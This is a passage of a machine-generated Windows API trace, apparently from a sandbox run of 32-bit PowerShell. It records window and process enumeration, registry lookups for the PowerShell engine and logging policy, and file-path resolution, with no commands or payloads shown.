GetWindowThreadProcessId (in: hWnd=0x400e0, lpdwProcessId=0xdbe794 | out: lpdwProcessId=0xdbe794) returned 0xfec [0127.511] GetWindowThreadProcessId (in: hWnd=0x101fc, lpdwProcessId=0xdbe794 | out: lpdwProcessId=0xdbe794) returned 0xcc8 [0127.511] GetWindowThreadProcessId (in: hWnd=0x101f4, lpdwProcessId=0xdbe794 | out: lpdwProcessId=0xdbe794) returned 0xc9c [0127.511] GetWindowThreadProcessId (in: hWnd=0x101d6, lpdwProcessId=0xdbe794 | out: lpdwProcessId=0xdbe794) returned 0xc9c [0127.511] GetWindowThreadProcessId (in: hWnd=0x101d0, lpdwProcessId=0xdbe794 | out: lpdwProcessId=0xdbe794) returned 0xc98 [0127.511] GetWindowThreadProcessId (in: hWnd=0x101cc, lpdwProcessId=0xdbe794 | out: lpdwProcessId=0xdbe794) returned 0xc98 [0127.512] GetWindowThreadProcessId (in: hWnd=0x101c0, lpdwProcessId=0xdbe794 | out: lpdwProcessId=0xdbe794) returned 0xc9c [0127.512] GetWindowThreadProcessId (in: hWnd=0x10198, lpdwProcessId=0xdbe794 | out: lpdwProcessId=0xdbe794) returned 0xc38 [0127.512] GetWindowThreadProcessId (in: hWnd=0x10196, lpdwProcessId=0xdbe794 | out: lpdwProcessId=0xdbe794) returned 0x80c [0127.512] GetWindowThreadProcessId (in: hWnd=0x10192, lpdwProcessId=0xdbe794 | out: lpdwProcessId=0xdbe794) returned 0xc38 [0127.512] GetWindowThreadProcessId (in: hWnd=0x1014c, lpdwProcessId=0xdbe794 | out: lpdwProcessId=0xdbe794) returned 0x940 [0127.512] GetWindowThreadProcessId (in: hWnd=0x1018c, lpdwProcessId=0xdbe794 | out: lpdwProcessId=0xdbe794) returned 0x940 [0127.512] GetWindowThreadProcessId (in: hWnd=0x1018e, lpdwProcessId=0xdbe794 | out: lpdwProcessId=0xdbe794) returned 0x940 [0127.513] GetWindowThreadProcessId (in: hWnd=0x10144, lpdwProcessId=0xdbe794 | out: lpdwProcessId=0xdbe794) returned 0x940 [0127.513] GetWindowThreadProcessId (in: hWnd=0x1013c, lpdwProcessId=0xdbe794 | out: lpdwProcessId=0xdbe794) returned 0x940 [0127.513] GetWindowThreadProcessId (in: hWnd=0x200b2, lpdwProcessId=0xdbe794 | out: lpdwProcessId=0xdbe794) returned 0x5cc [0127.513] GetWindowThreadProcessId (in: hWnd=0x1011a, lpdwProcessId=0xdbe794 | out: lpdwProcessId=0xdbe794) returned 0x940 [0127.513] GetWindowThreadProcessId (in: hWnd=0x10112, lpdwProcessId=0xdbe794 | out: lpdwProcessId=0xdbe794) returned 0x940 [0127.513] GetWindowThreadProcessId (in: hWnd=0x1010e, lpdwProcessId=0xdbe794 | out: lpdwProcessId=0xdbe794) returned 0x940 [0127.513] GetWindowThreadProcessId (in: hWnd=0x1010c, lpdwProcessId=0xdbe794 | out: lpdwProcessId=0xdbe794) returned 0x5cc [0127.514] GetWindowThreadProcessId (in: hWnd=0x100fc, lpdwProcessId=0xdbe794 | out: lpdwProcessId=0xdbe794) returned 0x8f8 [0127.514] GetWindowThreadProcessId (in: hWnd=0x100ee, lpdwProcessId=0xdbe794 | out: lpdwProcessId=0xdbe794) returned 0x80c [0127.514] GetWindowThreadProcessId (in: hWnd=0x100d2, lpdwProcessId=0xdbe794 | out: lpdwProcessId=0xdbe794) returned 0x80c [0127.514] GetWindowThreadProcessId (in: hWnd=0x20070, lpdwProcessId=0xdbe794 | out: lpdwProcessId=0xdbe794) returned 0xc98 [0127.514] GetWindowThreadProcessId (in: hWnd=0x100ae, lpdwProcessId=0xdbe794 | out: lpdwProcessId=0xdbe794) returned 0x80c [0127.514] GetWindowThreadProcessId (in: hWnd=0x10088, lpdwProcessId=0xdbe794 | out: lpdwProcessId=0xdbe794) returned 0x7b4 [0127.514] GetWindowThreadProcessId (in: hWnd=0x10082, lpdwProcessId=0xdbe794 | out: lpdwProcessId=0xdbe794) returned 0x5cc [0127.515] GetWindowThreadProcessId (in: hWnd=0x20066, lpdwProcessId=0xdbe794 | out: lpdwProcessId=0xdbe794) returned 0x5cc [0127.515] GetWindowThreadProcessId (in: hWnd=0x20032, lpdwProcessId=0xdbe794 | out: lpdwProcessId=0xdbe794) returned 0x7e8 [0127.515] GetWindowThreadProcessId (in: hWnd=0x1003a, lpdwProcessId=0xdbe794 | out: lpdwProcessId=0xdbe794) returned 0x374 [0127.515] GetWindowThreadProcessId (in: hWnd=0x2006c, lpdwProcessId=0xdbe794 | out: lpdwProcessId=0xdbe794) returned 0x44c [0127.515] GetWindowThreadProcessId (in: hWnd=0x100f0, lpdwProcessId=0xdbe794 | out: lpdwProcessId=0xdbe794) returned 0x5cc [0127.515] GetWindowThreadProcessId (in: hWnd=0x1015a, lpdwProcessId=0xdbe794 | out: lpdwProcessId=0xdbe794) returned 0xae8 [0127.515] GetWindowThreadProcessId (in: hWnd=0x100e6, lpdwProcessId=0xdbe794 | out: lpdwProcessId=0xdbe794) returned 0x80c [0127.516] GetWindowThreadProcessId (in: hWnd=0x10092, lpdwProcessId=0xdbe794 | out: lpdwProcessId=0xdbe794) returned 0x80c [0127.516] GetWindowThreadProcessId (in: hWnd=0x300ec, lpdwProcessId=0xdbe794 | out: lpdwProcessId=0xdbe794) returned 0x888 [0127.516] GetWindowThreadProcessId (in: hWnd=0x202c6, lpdwProcessId=0xdbe794 | out: lpdwProcessId=0xdbe794) returned 0xdb8 [0127.516] GetWindowThreadProcessId (in: hWnd=0x9002e, lpdwProcessId=0xdbe794 | out: lpdwProcessId=0xdbe794) returned 0xdc8 [0127.516] GetWindowThreadProcessId (in: hWnd=0x102b2, lpdwProcessId=0xdbe794 | out: lpdwProcessId=0xdbe794) returned 0xb9c [0127.599] GetWindowThreadProcessId (in: hWnd=0x7005c, lpdwProcessId=0xdbe794 | out: lpdwProcessId=0xdbe794) returned 0x13dc [0127.599] GetWindowThreadProcessId (in: hWnd=0x70030, lpdwProcessId=0xdbe794 | out: lpdwProcessId=0xdbe794) returned 0x13dc [0127.599] GetWindowThreadProcessId (in: hWnd=0x502b0, lpdwProcessId=0xdbe794 | out: lpdwProcessId=0xdbe794) returned 0xee0 [0127.599] GetWindowThreadProcessId (in: hWnd=0x102ac, lpdwProcessId=0xdbe794 | out: lpdwProcessId=0xdbe794) returned 0x5a4 [0127.600] GetWindowThreadProcessId (in: hWnd=0x102a8, lpdwProcessId=0xdbe794 | out: lpdwProcessId=0xdbe794) returned 0xd34 [0127.600] GetWindowThreadProcessId (in: hWnd=0x102a6, lpdwProcessId=0xdbe794 | out: lpdwProcessId=0xdbe794) returned 0x564 [0127.600] GetWindowThreadProcessId (in: hWnd=0x202a0, lpdwProcessId=0xdbe794 | out: lpdwProcessId=0xdbe794) returned 0xdcc [0127.600] GetWindowThreadProcessId (in: hWnd=0x1029e, lpdwProcessId=0xdbe794 | out: lpdwProcessId=0xdbe794) returned 0xe14 [0127.600] GetWindowThreadProcessId (in: hWnd=0x20298, lpdwProcessId=0xdbe794 | out: lpdwProcessId=0xdbe794) returned 0xa70 [0127.600] GetWindowThreadProcessId (in: hWnd=0x20294, lpdwProcessId=0xdbe794 | out: lpdwProcessId=0xdbe794) returned 0xcfc [0127.600] GetWindowThreadProcessId (in: hWnd=0x20290, lpdwProcessId=0xdbe794 | out: lpdwProcessId=0xdbe794) returned 0xcd4 [0127.600] GetWindowThreadProcessId (in: hWnd=0x2028c, lpdwProcessId=0xdbe794 | out: lpdwProcessId=0xdbe794) returned 0xff8 [0127.601] GetWindowThreadProcessId (in: hWnd=0x20288, lpdwProcessId=0xdbe794 | out: lpdwProcessId=0xdbe794) returned 0xf74 [0127.601] GetWindowThreadProcessId (in: hWnd=0x10286, lpdwProcessId=0xdbe794 | out: lpdwProcessId=0xdbe794) returned 0xf6c [0127.601] GetWindowThreadProcessId (in: hWnd=0x20280, lpdwProcessId=0xdbe794 | out: lpdwProcessId=0xdbe794) returned 0xfbc [0127.601] GetWindowThreadProcessId (in: hWnd=0x2027c, lpdwProcessId=0xdbe794 | out: lpdwProcessId=0xdbe794) returned 0xf80 [0127.601] GetWindowThreadProcessId (in: hWnd=0x20278, lpdwProcessId=0xdbe794 | out: lpdwProcessId=0xdbe794) returned 0xdb0 [0127.601] GetWindowThreadProcessId (in: hWnd=0x20274, lpdwProcessId=0xdbe794 | out: lpdwProcessId=0xdbe794) returned 0xf64 [0127.601] GetWindowThreadProcessId (in: hWnd=0x10270, lpdwProcessId=0xdbe794 | out: lpdwProcessId=0xdbe794) returned 0xf60 [0127.601] GetWindowThreadProcessId (in: hWnd=0x2026c, lpdwProcessId=0xdbe794 | out: lpdwProcessId=0xdbe794) returned 0xeb8 [0127.602] GetWindowThreadProcessId (in: hWnd=0x20268, lpdwProcessId=0xdbe794 | out: lpdwProcessId=0xdbe794) returned 0xeb4 [0127.602] GetWindowThreadProcessId (in: hWnd=0x20264, lpdwProcessId=0xdbe794 | out: lpdwProcessId=0xdbe794) returned 0xea8 [0127.602] GetWindowThreadProcessId (in: hWnd=0x20260, lpdwProcessId=0xdbe794 | out: lpdwProcessId=0xdbe794) returned 0xea4 [0127.602] GetWindowThreadProcessId (in: hWnd=0x1025e, lpdwProcessId=0xdbe794 | out: lpdwProcessId=0xdbe794) returned 0x6e0 [0127.602] GetWindowThreadProcessId (in: hWnd=0x1025a, lpdwProcessId=0xdbe794 | out: lpdwProcessId=0xdbe794) returned 0xf0 [0127.602] GetWindowThreadProcessId (in: hWnd=0x20254, lpdwProcessId=0xdbe794 | out: lpdwProcessId=0xdbe794) returned 0x648 [0127.602] GetWindowThreadProcessId (in: hWnd=0x20250, lpdwProcessId=0xdbe794 | out: lpdwProcessId=0xdbe794) returned 0xa80 [0127.603] GetWindowThreadProcessId (in: hWnd=0x2024c, lpdwProcessId=0xdbe794 | out: lpdwProcessId=0xdbe794) returned 0x5b8 [0127.603] GetWindowThreadProcessId (in: hWnd=0x20248, lpdwProcessId=0xdbe794 | out: lpdwProcessId=0xdbe794) returned 0x440 [0127.603] GetWindowThreadProcessId (in: hWnd=0x20244, lpdwProcessId=0xdbe794 | out: lpdwProcessId=0xdbe794) returned 0xe54 [0127.603] GetWindowThreadProcessId (in: hWnd=0x20240, lpdwProcessId=0xdbe794 | out: lpdwProcessId=0xdbe794) returned 0x2bc [0127.603] GetWindowThreadProcessId (in: hWnd=0x2023c, lpdwProcessId=0xdbe794 | out: lpdwProcessId=0xdbe794) returned 0x1ec [0127.603] GetWindowThreadProcessId (in: hWnd=0x20238, lpdwProcessId=0xdbe794 | out: lpdwProcessId=0xdbe794) returned 0xac8 [0127.605] GetWindowThreadProcessId (in: hWnd=0x20234, lpdwProcessId=0xdbe794 | out: lpdwProcessId=0xdbe794) returned 0xcb8 [0127.606] GetWindowThreadProcessId (in: hWnd=0x10232, lpdwProcessId=0xdbe794 | out: lpdwProcessId=0xdbe794) returned 0x738 [0127.606] GetWindowThreadProcessId (in: hWnd=0x2022c, lpdwProcessId=0xdbe794 | out: lpdwProcessId=0xdbe794) returned 0xdf4 [0127.606] GetWindowThreadProcessId (in: hWnd=0x20228, lpdwProcessId=0xdbe794 | out: lpdwProcessId=0xdbe794) returned 0xdfc [0127.606] GetWindowThreadProcessId (in: hWnd=0x20224, lpdwProcessId=0xdbe794 | out: lpdwProcessId=0xdbe794) returned 0xa88 [0127.606] GetWindowThreadProcessId (in: hWnd=0x10220, lpdwProcessId=0xdbe794 | out: lpdwProcessId=0xdbe794) returned 0x6d8 [0127.607] GetWindowThreadProcessId (in: hWnd=0x2021e, lpdwProcessId=0xdbe794 | out: lpdwProcessId=0xdbe794) returned 0x5c4 [0127.607] GetWindowThreadProcessId (in: hWnd=0x20218, lpdwProcessId=0xdbe794 | out: lpdwProcessId=0xdbe794) returned 0xdc0 [0127.607] GetWindowThreadProcessId (in: hWnd=0x20214, lpdwProcessId=0xdbe794 | out: lpdwProcessId=0xdbe794) returned 0xdc4 [0127.607] GetWindowThreadProcessId (in: hWnd=0x20210, lpdwProcessId=0xdbe794 | out: lpdwProcessId=0xdbe794) returned 0xc48 [0127.607] GetWindowThreadProcessId (in: hWnd=0x2020c, lpdwProcessId=0xdbe794 | out: lpdwProcessId=0xdbe794) returned 0xb70 [0127.607] GetWindowThreadProcessId (in: hWnd=0x20208, lpdwProcessId=0xdbe794 | out: lpdwProcessId=0xdbe794) returned 0x58 [0127.607] GetWindowThreadProcessId (in: hWnd=0x20202, lpdwProcessId=0xdbe794 | out: lpdwProcessId=0xdbe794) returned 0xda0 [0127.608] GetWindowThreadProcessId (in: hWnd=0x401e6, lpdwProcessId=0xdbe794 | out: lpdwProcessId=0xdbe794) returned 0xc18 [0127.608] GetWindowThreadProcessId (in: hWnd=0x40076, lpdwProcessId=0xdbe794 | out: lpdwProcessId=0xdbe794) returned 0xd90 [0127.608] GetWindowThreadProcessId (in: hWnd=0x3007a, lpdwProcessId=0xdbe794 | out: lpdwProcessId=0xdbe794) returned 0xd6c [0127.608] GetWindowThreadProcessId (in: hWnd=0x40062, lpdwProcessId=0xdbe794 | out: lpdwProcessId=0xdbe794) returned 0xd68 [0127.608] GetWindowThreadProcessId (in: hWnd=0x30052, lpdwProcessId=0xdbe794 | out: lpdwProcessId=0xdbe794) returned 0xd54 [0127.608] GetWindowThreadProcessId (in: hWnd=0x20050, lpdwProcessId=0xdbe794 | out: lpdwProcessId=0xdbe794) returned 0xd50 [0127.609] GetWindowThreadProcessId (in: hWnd=0x3004e, lpdwProcessId=0xdbe794 | out: lpdwProcessId=0xdbe794) returned 0xab4 [0127.609] GetWindowThreadProcessId (in: hWnd=0x3004a, lpdwProcessId=0xdbe794 | out: lpdwProcessId=0xdbe794) returned 0xac0 [0127.609] GetWindowThreadProcessId (in: hWnd=0x201ea, lpdwProcessId=0xdbe794 | out: lpdwProcessId=0xdbe794) returned 0xd24 [0127.609] GetWindowThreadProcessId (in: hWnd=0x2005e, lpdwProcessId=0xdbe794 | out: lpdwProcessId=0xdbe794) returned 0xd10 [0127.609] GetWindowThreadProcessId (in: hWnd=0x5007e, lpdwProcessId=0xdbe794 | out: lpdwProcessId=0xdbe794) returned 0xa24 [0127.609] GetWindowThreadProcessId (in: hWnd=0x201da, lpdwProcessId=0xdbe794 | out: lpdwProcessId=0xdbe794) returned 0x7f0 [0127.610] GetWindowThreadProcessId (in: hWnd=0x4006a, lpdwProcessId=0xdbe794 | out: lpdwProcessId=0xdbe794) returned 0x550 [0127.610] GetWindowThreadProcessId (in: hWnd=0x50048, lpdwProcessId=0xdbe794 | out: lpdwProcessId=0xdbe794) returned 0x384 [0127.610] GetWindowThreadProcessId (in: hWnd=0x40044, lpdwProcessId=0xdbe794 | out: lpdwProcessId=0xdbe794) returned 0x4e4 [0127.610] GetWindowThreadProcessId (in: hWnd=0x3002c, lpdwProcessId=0xdbe794 | out: lpdwProcessId=0xdbe794) returned 0x4fc [0127.611] GetWindowThreadProcessId (in: hWnd=0x30156, lpdwProcessId=0xdbe794 | out: lpdwProcessId=0xdbe794) returned 0xa10 [0127.611] GetWindowThreadProcessId (in: hWnd=0x401b8, lpdwProcessId=0xdbe794 | out: lpdwProcessId=0xdbe794) returned 0xfec [0127.611] GetWindowThreadProcessId (in: hWnd=0x101fe, lpdwProcessId=0xdbe794 | out: lpdwProcessId=0xdbe794) returned 0xcc8 [0127.611] GetWindowThreadProcessId (in: hWnd=0x101ce, lpdwProcessId=0xdbe794 | out: lpdwProcessId=0xdbe794) returned 0xc98 [0127.611] GetWindowThreadProcessId (in: hWnd=0x101c2, lpdwProcessId=0xdbe794 | out: lpdwProcessId=0xdbe794) returned 0xc9c [0127.611] GetWindowThreadProcessId (in: hWnd=0x10194, lpdwProcessId=0xdbe794 | out: lpdwProcessId=0xdbe794) returned 0xc38 [0127.611] GetWindowThreadProcessId (in: hWnd=0x1011e, lpdwProcessId=0xdbe794 | out: lpdwProcessId=0xdbe794) returned 0x5cc [0127.612] GetWindowThreadProcessId (in: hWnd=0x10110, lpdwProcessId=0xdbe794 | out: lpdwProcessId=0xdbe794) returned 0x940 [0127.612] GetWindowThreadProcessId (in: hWnd=0x100fe, lpdwProcessId=0xdbe794 | out: lpdwProcessId=0xdbe794) returned 0x8f8 [0127.612] GetWindowThreadProcessId (in: hWnd=0x1008a, lpdwProcessId=0xdbe794 | out: lpdwProcessId=0xdbe794) returned 0x7b4 [0127.612] GetWindowThreadProcessId (in: hWnd=0x10080, lpdwProcessId=0xdbe794 | out: lpdwProcessId=0xdbe794) returned 0x5cc [0127.621] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x60d94c8, Length=0x20000, ResultLength=0xdbe868 | out: SystemInformation=0x60d94c8, ResultLength=0xdbe868*=0x26638) returned 0xc0000004 [0127.627] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x60f94e8, Length=0x28e38, ResultLength=0xdbe868 | out: SystemInformation=0x60f94e8, ResultLength=0xdbe868*=0x1bf68) returned 0x0 [0127.741] WerSetFlags () returned 0x0 [0127.786] SetThreadPreferredUILanguages (in: dwFlags=0x100, pwszLanguagesBuffer=0x0, pulNumLanguages=0x0 | out: pulNumLanguages=0x0) returned 1 [0128.564] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0xdbe880, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0xdbe87c | out: pulNumLanguages=0xdbe880, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0xdbe87c) returned 1 [0128.564] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0xdbe880, pwszLanguagesBuffer=0x510c87c, pcchLanguagesBuffer=0xdbe87c | out: pulNumLanguages=0xdbe880, pwszLanguagesBuffer=0x510c87c, pcchLanguagesBuffer=0xdbe87c) returned 1 [0128.573] GetUserDefaultLocaleName (in: lpLocaleName=0xdbe814, cchLocaleName=16 | out: lpLocaleName="en-US") returned 6 [0129.255] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0xdbdfc4, nSize=0x80 | out: lpBuffer="￿￿?Ûဢ玩㦀牪皴犣佚玲屲ꢗ壘į皴犣㦀牪胰犎㦀牪胰犎Û啾玲￿￿Û꛰珿￿￿佚玲刐玲䪌犭") returned 0x0 [0129.258] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0xdbdfc4, nSize=0x80 | out: lpBuffer="￿￿ꅬIJÛᩚ玿㚀ĭ\x01⌀") returned 0x0 [0129.591] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe.config", nBufferLength=0x105, lpBuffer=0xdbd7d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe.config", lpFilePart=0x0) returned 0x40 [0129.592] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xdbdc8c) returned 1 [0129.592] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe.config" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\powershell.exe.config"), fInfoLevelId=0x0, lpFileInformation=0xdbdd08 | out: lpFileInformation=0xdbdd08*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0129.592] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xdbdc88) returned 1 [0131.205] CoCreateGuid (in: pguid=0xdbdf34 | out: pguid=0xdbdf34*(Data1=0xe49c8443, Data2=0x7fdb, Data3=0x4b04, Data4=([0]=0xbb, [1]=0x95, [2]=0xa6, [3]=0x47, [4]=0x5c, [5]=0x19, [6]=0x4b, [7]=0xf4))) returned 0x0 [0131.472] CoCreateGuid (in: pguid=0xdbdf28 | out: pguid=0xdbdf28*(Data1=0xc5b9173c, Data2=0xb4f8, Data3=0x444b, Data4=([0]=0xab, [1]=0x7a, [2]=0x59, [3]=0xc, [4]=0x53, [5]=0x6, [6]=0x17, [7]=0x16))) returned 0x0 [0131.472] CoCreateGuid (in: pguid=0xdbdf28 | out: pguid=0xdbdf28*(Data1=0xd5aa94de, Data2=0xb41b, Data3=0x4269, Data4=([0]=0xaa, [1]=0x8b, [2]=0x44, [3]=0x33, [4]=0x81, [5]=0x73, [6]=0x6c, [7]=0xc8))) returned 0x0 [0131.472] CoCreateGuid (in: pguid=0xdbdf28 | out: pguid=0xdbdf28*(Data1=0x7c4ea919, Data2=0xe5ab, Data3=0x4cc6, Data4=([0]=0xba, [1]=0x66, [2]=0x1e, [3]=0xe5, [4]=0xcb, [5]=0x36, [6]=0xaa, [7]=0xf0))) returned 0x0 [0131.472] CoCreateGuid (in: pguid=0xdbdf28 | out: pguid=0xdbdf28*(Data1=0x70afe045, Data2=0xf99c, Data3=0x4e4d, Data4=([0]=0xa9, [1]=0xcf, [2]=0xb6, [3]=0xe5, [4]=0xd4, [5]=0xa0, [6]=0x23, [7]=0x70))) returned 0x0 [0131.472] CoCreateGuid (in: pguid=0xdbdf28 | out: pguid=0xdbdf28*(Data1=0xdf782bd9, Data2=0x2477, Data3=0x4a14, Data4=([0]=0xab, [1]=0x87, [2]=0xec, [3]=0x4f, [4]=0xb5, [5]=0xe3, [6]=0xcb, [7]=0xfd))) returned 0x0 [0131.472] CoCreateGuid (in: pguid=0xdbdf28 | out: pguid=0xdbdf28*(Data1=0x38be9d8d, Data2=0x2383, Data3=0x404b, Data4=([0]=0xb5, [1]=0xb4, [2]=0x89, [3]=0xb5, [4]=0xe4, [5]=0xc, [6]=0x77, [7]=0x34))) returned 0x0 [0131.472] CoCreateGuid (in: pguid=0xdbdf28 | out: pguid=0xdbdf28*(Data1=0x25caaa57, Data2=0x1148, Data3=0x4681, Data4=([0]=0x97, [1]=0xa9, [2]=0x31, [3]=0x14, [4]=0x51, [5]=0x47, [6]=0x4b, [7]=0x47))) returned 0x0 [0131.472] CoCreateGuid (in: pguid=0xdbdf28 | out: pguid=0xdbdf28*(Data1=0x569e0aaa, Data2=0x2a98, Data3=0x42cd, Data4=([0]=0xb8, [1]=0x6a, [2]=0x35, [3]=0x70, [4]=0x8b, [5]=0xf0, [6]=0x55, [7]=0xf5))) returned 0x0 [0131.473] CoCreateGuid (in: pguid=0xdbdf28 | out: pguid=0xdbdf28*(Data1=0x8980c274, Data2=0x54b6, Data3=0x4a1a, Data4=([0]=0xad, [1]=0x8c, [2]=0x85, [3]=0xb, [4]=0xd2, [5]=0xe8, [6]=0xfe, [7]=0xa5))) returned 0x0 [0131.473] CoCreateGuid (in: pguid=0xdbdf28 | out: pguid=0xdbdf28*(Data1=0x649fe19b, Data2=0x6585, Data3=0x416b, Data4=([0]=0x9f, [1]=0x80, [2]=0x3d, [3]=0x8b, [4]=0x89, [5]=0x81, [6]=0xcf, [7]=0x98))) returned 0x0 [0131.473] CoCreateGuid (in: pguid=0xdbdf28 | out: pguid=0xdbdf28*(Data1=0x8be0eed, Data2=0xeed1, Data3=0x44a5, Data4=([0]=0x95, [1]=0x41, [2]=0xf4, [3]=0x1, [4]=0xb9, [5]=0x1e, [6]=0x7, [7]=0xae))) returned 0x0 [0131.482] CoCreateGuid (in: pguid=0xdbdf28 | out: pguid=0xdbdf28*(Data1=0xe62bdc67, Data2=0xf711, Data3=0x4f6b, Data4=([0]=0xb1, [1]=0xe5, [2]=0xcc, [3]=0xd5, [4]=0x4, [5]=0x83, [6]=0x3, [7]=0x44))) returned 0x0 [0131.482] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0xdbdc44, nSize=0xfa | out: lpBuffer="䳆玮拾ꢗ\x14\x01徠玩哨؍") returned 0x0 [0131.695] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\3\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xdbe7cc | out: phkResult=0xdbe7cc*=0x644) returned 0x0 [0131.696] RegQueryValueExW (in: hKey=0x644, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xdbe7ec, lpData=0x0, lpcbData=0xdbe7e8*=0x0 | out: lpType=0xdbe7ec*=0x1, lpData=0x0, lpcbData=0xdbe7e8*=0x56) returned 0x0 [0131.696] RegQueryValueExW (in: hKey=0x644, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xdbe7ec, lpData=0x5125d2c, lpcbData=0xdbe7e8*=0x56 | out: lpType=0xdbe7ec*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0xdbe7e8*=0x56) returned 0x0 [0131.696] RegCloseKey (hKey=0x644) returned 0x0 [0131.700] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0xdbde3c, nSize=0xfa | out: lpBuffer="䳆玮島ꢗ\x14\x01徠玩哨؍嬀玲\x01") returned 0x0 [0131.704] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Microsoft\\Windows\\PowerShell\\ModuleLogging", ulOptions=0x0, samDesired=0x20019, phkResult=0xdbe79c | out: phkResult=0xdbe79c*=0x0) returned 0x2 [0131.705] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\PowerShell\\ModuleLogging", ulOptions=0x0, samDesired=0x20019, phkResult=0xdbe79c | out: phkResult=0xdbe79c*=0x0) returned 0x2 [0132.203] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x88 [0132.204] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x88, lpBuffer=0x133ac60, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x87 [0132.636] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\3\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xdbe744 | out: phkResult=0xdbe744*=0x288) returned 0x0 [0132.639] RegQueryValueExW (in: hKey=0x288, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xdbe764, lpData=0x0, lpcbData=0xdbe760*=0x0 | out: lpType=0xdbe764*=0x1, lpData=0x0, lpcbData=0xdbe760*=0x56) returned 0x0 [0132.639] RegQueryValueExW (in: hKey=0x288, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xdbe764, lpData=0x512d89c, lpcbData=0xdbe760*=0x56 | out: lpType=0xdbe764*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0xdbe760*=0x56) returned 0x0 [0132.639] RegCloseKey (hKey=0x288) returned 0x0 [0133.828] CoTaskMemAlloc (cb=0x20c) returned 0x764e030 [0133.828] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x764e030 | out: pszPath="C:\\Users\\FD1HVy\\AppData\\Local") returned 0x0 [0133.835] CoTaskMemFree (pv=0x764e030) [0133.835] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x1e [0133.835] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local", nBufferLength=0x1e, lpBuffer=0x133ac60, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local", lpFilePart=0x0) returned 0x1d [0133.836] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\Windows\\PowerShell", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0133.836] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\Windows\\PowerShell", nBufferLength=0x3b, lpBuffer=0x133ac60, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\Windows\\PowerShell", lpFilePart=0x0) returned 0x3a [0133.836] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xdbe7c4) returned 1 [0133.836] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\Windows\\PowerShell" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\microsoft\\windows\\powershell"), fInfoLevelId=0x0, lpFileInformation=0xdbe840 | out: lpFileInformation=0xdbe840*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd3ec8443, ftCreationTime.dwHighDateTime=0x1d327c2, ftLastAccessTime.dwLowDateTime=0xdc924418, ftLastAccessTime.dwHighDateTime=0x1d327c2, ftLastWriteTime.dwLowDateTime=0xdc924418, ftLastWriteTime.dwHighDateTime=0x1d327c2, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0133.837] SetThreadErrorMode (dwNewMode=0x0, 